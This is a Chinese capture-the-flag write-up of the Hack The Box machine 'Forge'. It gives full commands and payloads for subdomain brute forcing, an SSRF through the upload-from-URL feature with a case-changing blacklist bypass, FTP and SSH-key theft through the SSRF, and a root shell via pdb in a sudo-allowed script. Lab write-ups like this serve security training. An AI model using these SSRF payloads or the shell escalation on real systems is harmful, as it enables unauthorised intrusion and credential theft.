【Hack The Box】Linux练习-- Forge
创始人
2024-02-21 06:55:06

HTB 学习笔记

【Hack The Box】Linux练习-- Forge


🔥系列专栏:Hack The Box
🎉欢迎关注🔎点赞👍收藏⭐️留言📝
📆首发时间:🌴2022年11月27日🌴
🍭作者水平很有限,如果发现错误,还望告知,感谢!

文章目录

  • HTB 学习笔记
    • 信息收集
    • 爆破域名
    • 80
        • 目录爆破
    • admin.forge.htb
    • 域名验证黑名单绕过
    • 关于ssrf的拓展

在这里插入图片描述

信息收集

22/tcp open  ssh     OpenSSH 8.2p1 Ubuntu 4ubuntu0.2 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   3072 4f:78:65:66:29:e4:87:6b:3c:cc:b4:3a:d2:57:20:ac (RSA)
|   256 79:df:3a:f1:fe:87:4a:57:b0:fd:4e:d0:54:c6:28:d9 (ECDSA)
|_  256 b0:58:11:40:6d:8c:bd:c5:72:aa:83:08:c5:51:fb:33 (ED25519)
80/tcp open  http    Apache httpd 2.4.41
|_http-server-header: Apache/2.4.41 (Ubuntu)
|_http-title: Did not follow redirect to http://forge.htb
Service Info: Host: 10.10.11.111; OS: Linux; CPE: cpe:/o:linux:linux_kernel

nmap还注意到该站点返回重定向到 http://forge.htb.
所以我将添加到hosts

爆破域名

wfuzz -u http://10.10.11.111 -H "Host: FUZZ.forge.htb" -w /usr/share/seclists/Discovery/DNS/subdomains-top1million-20000.txt --hw 26

鉴于域名的使用,我将开始使用子域的蛮力运行 wfuzz. 这 -H "Host: FUZZ.forge.htb"选项将尝试使用不同的主机标头,我可以查找任何与默认大小写不匹配的标头。 我将在没有过滤的情况下启动它,以了解默认情况。 字符数根据子域的长度而变化,但字数有很多26的,所以我将使用 --hw 26: 根据响应报文字数进行隐藏(hide word)

唯一有趣的是 admin.forge.htb. 我会将域和子域都添加到 /etc/hosts.

80

在这里插入图片描述
可以上传图片
在这里插入图片描述
上传期间我上传了一个PHP文件,没有验证,并且可以有链接,只不过我点开了那个php文件,似乎并没有解析
对于这个现象,我抓包分析了一下

HTTP/1.1 200 OK
Date: Thu, 19 Aug 2021 22:30:14 GMT
Server: Apache/2.4.41 (Ubuntu)
Content-Disposition: inline; filename=28C0mwXLXZBu1BkVHClV
Content-Length: 44
Last-Modified: Thu, 19 Aug 2021 22:30:13 GMT
Cache-Control: no-cache
Connection: close
Content-Type: image/jpg

后门代码被当作文本传输,不被解析

于是我尝试第二个上传模式
在这里插入图片描述我将在本地开启一个python服务器,然后试图远程请求
看返回信息,一切正常
在这里插入图片描述而如果我们换成对80端口的监听nc,我们就会收到来自服务器的请求
是一个python2 服务器,具体版本不知道
但是比较常见的有python服务器有flask等一些
在这里插入图片描述

目录爆破

目录爆破没有任何结果

admin.forge.htb

网站提示只有localhost可以访问

看到这里,我们应该有所警示
在 SSRF 中,攻击者可能会导致服务器连接到仅限内部的服务。
也许我们应该使用ssrf攻击,并且仅限于连接到内部的网页并没有上一个靶场那样的302跳转,要是用ssrf,我们必须知道一些服务器的信息,我们目前猜测服务器是python2版本的某一种服务器,这不确定,为了防止我们掉进兔子洞,应该把这种盲猜的办法最后进行

现在大部分的精力应该放在如何利用url上传上
我将在url上传框输入刚才需要我们本地登陆的子域名(因为这是同一台服务器,所以能绕过本地的验证)
额,黑名单,看到这里其实心里更有谱了,此地无银三百两
所以我们把那个只允许内部访问的域名放到这里来上传,他就会把这个目录的内容上传,而这是我们curl访问完整的他给出的上传成功的目录,就可以间接地看到网站全貌
在这里插入图片描述

域名验证黑名单绕过

我们将admin.forge.htb全部换成大写去绕过
在这里插入图片描述
浏览器直接访问依旧是错误,我们用curl不带任何参数访问



Admin Portal









Welcome Admins!

里面暴露出了一个新的目录
/announcements
再次上传
http://admin.forge.htb/announcements



Announcements




  • An internal ftp server has been setup with credentials as user:heightofsecurity123!
  • The /upload endpoint now supports ftp, ftps, http and https protocols for uploading from url.
  • The /upload endpoint has been configured for easy scripting of uploads, and for uploading an image, one can simply pass a url with ?u=<url>.

在这里插入图片描述
获得了一组凭据

user:heightofsecurity123!

还告诉你了一种上传方法,并且支持从ftp上传
语法如下
?u= 那目前的思路就是从他的ftp直接传出来,然后我们查看
但我说实话他给的这个方法真没看懂
最后实验出来了

http://ADMIN.FORGE.HTB/u?=ftp://user:heightofsecurity123!@127.0.0.1

我们同样利用curl来访问上传成功的路径
在这里插入图片描述
发现我们可以直接从ftp发现私钥,在枚举了snap文件夹之后,我决定尝试看能不能访问到私钥,因为一般来说user.txt都是在/home/user中,而.ssh也在这个文件夹中

接下来上传这个url

http://ADMIN.FORGE.htb/upload?u=ftp://user:heightofsecurity123!@127.0.1.1/.ssh/id_rsa

在这里插入图片描述复制到本id_rsa之后赋权600连接ssh

在这里插入图片描述第一件事永远都是
sudo -l

user@forge:~$ sudo -l
Matching Defaults entries for user on forge:env_reset, mail_badpass,secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/binUser user may run the following commands on forge:(ALL : ALL) NOPASSWD: /usr/bin/python3 /opt/remote-manage.py

又是一个脚本文件
查看一下

!/usr/bin/env python3
import socket
import random
import subprocess
import pdbport = random.randint(1025, 65535)try:sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)sock.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)sock.bind(('127.0.0.1', port))sock.listen(1)print(f'Listening on localhost:{port}')(clientsock, addr) = sock.accept()clientsock.send(b'Enter the secret passsword: ')if clientsock.recv(1024).strip().decode() != 'secretadminpassword':clientsock.send(b'Wrong password!\n')else:clientsock.send(b'Welcome admin!\n')while True:clientsock.send(b'\nWhat do you wanna do: \n')clientsock.send(b'[1] View processes\n')clientsock.send(b'[2] View free memory\n')clientsock.send(b'[3] View listening sockets\n')clientsock.send(b'[4] Quit\n')option = int(clientsock.recv(1024).strip())if option == 1:clientsock.send(subprocess.getoutput('ps aux').encode())elif option == 2:clientsock.send(subprocess.getoutput('df').encode())elif option == 3:clientsock.send(subprocess.getoutput('ss -lnt').encode())elif option == 4:clientsock.send(b'Bye\n')break
except Exception as e:print(e)pdb.post_mortem(e.__traceback__)
finally:quit()

decode() != secretadminpassword
这是一个小程序,四个选项,可以查看日志,进程,还有跟你说拜拜
并且需要验证密码是否为上面的那个
检查文件,我们只能读,当然这是正常的

具体的信息我将执行一下这个程序
发现他显示监听这个随机端口
在这里插入图片描述再开一个ssh端口去nc这个服务

在这里插入图片描述当我输入错误的密码回立即断开
并且服务终止

在这里插入图片描述
我现在输入正确的密码,在接下来的选项中胡乱输入
看看能有啥问题

在这里插入图片描述
当我输入dashabi的时候,发现他进入了pdb的调试器
直接输入这个即可
gifio中可查询

import os;os.system(“/bin/sh”)

在这里插入图片描述

关于ssrf的拓展

我知道这是一个 Python 脚本,它正在处理我的输入、做出过滤决定,然后使用 requests模块发出 HTTP 请求。 默认情况下,请求模块将遵循 HTTP 重定向,除非调用该函数 allow_redirects=False.

这是在我们发现nc端口接收到的web请求是来自一个python2服务器的时候知道的
由于如果我们输入的url是我们的本地一个文件,并且本地文件要重定向到黑名单,而这个时候url过滤器已经在第一次向我们发出请求的时候通过了,所以再重定向就不存在黑名单了

由于他是pythin2服务器,所以我假设他是flask

我将写一个flask服务器文件

#!/usr/bin/env pythonfrom flask import Flask, redirect, requestapp = Flask(__name__)@app.route("/")
def admin():return redirect('http://admin.forge.htb/')if __name__ == "__main__":app.run(debug=True, host="0.0.0.0", port=80)    

这个服务器会要求重定向到http://admin.forge.htb/
这里有点问题,我的flask服务器起不来了
如果有知道的大佬请指点
谢谢🙏

相关内容

热门资讯

埃菲尔铁塔在哪 中国仿建埃菲尔... 2019年4月26日,广西南宁市,街头惊现一座巨型山寨版埃菲尔铁塔,高约20米,白色塔身,造型逼真,...
苗族的传统节日 贵州苗族节日有... 【岜沙苗族芦笙节】岜沙,苗语叫“分送”,距从江县城7.5公里,是世界上最崇拜树木并以树为神的枪手部落...
北京的名胜古迹 北京最著名的景... 北京从元代开始,逐渐走上帝国首都的道路,先是成为大辽朝五大首都之一的南京城,随着金灭辽,金代从海陵王...
应用未安装解决办法 平板应用未... ---IT小技术,每天Get一个小技能!一、前言描述苹果IPad2居然不能安装怎么办?与此IPad不...
长白山自助游攻略 吉林长白山游... 昨天介绍了西坡的景点详细请看链接:一个人的旅行,据说能看到长白山天池全凭运气,您的运气如何?今日介绍...
脚上的穴位图 脚面经络图对应的... 人体穴位作用图解大全更清晰直观的标注了各个人体穴位的作用,包括头部穴位图、胸部穴位图、背部穴位图、胳...
世界上最漂亮的人 世界上最漂亮... 此前在某网上,选出了全球265万颜值姣好的女性。从这些数量庞大的女性群体中,人们投票选出了心目中最美...
demo什么意思 demo版本... 618快到了,各位的小金库大概也在准备开闸放水了吧。没有小金库的,也该向老婆撒娇卖萌服个软了,一切只...
猫咪吃了塑料袋怎么办 猫咪误食... 你知道吗?塑料袋放久了会长猫哦!要说猫咪对塑料袋的喜爱程度完完全全可以媲美纸箱家里只要一有塑料袋的响...
北京的名胜古迹 北京最著名的景... 北京从元代开始,逐渐走上帝国首都的道路,先是成为大辽朝五大首都之一的南京城,随着金灭辽,金代从海陵王...
埃菲尔铁塔在哪 中国仿建埃菲尔... 2019年4月26日,广西南宁市,街头惊现一座巨型山寨版埃菲尔铁塔,高约20米,白色塔身,造型逼真,...
苗族的传统节日 贵州苗族节日有... 【岜沙苗族芦笙节】岜沙,苗语叫“分送”,距从江县城7.5公里,是世界上最崇拜树木并以树为神的枪手部落...
应用未安装解决办法 平板应用未... ---IT小技术,每天Get一个小技能!一、前言描述苹果IPad2居然不能安装怎么办?与此IPad不...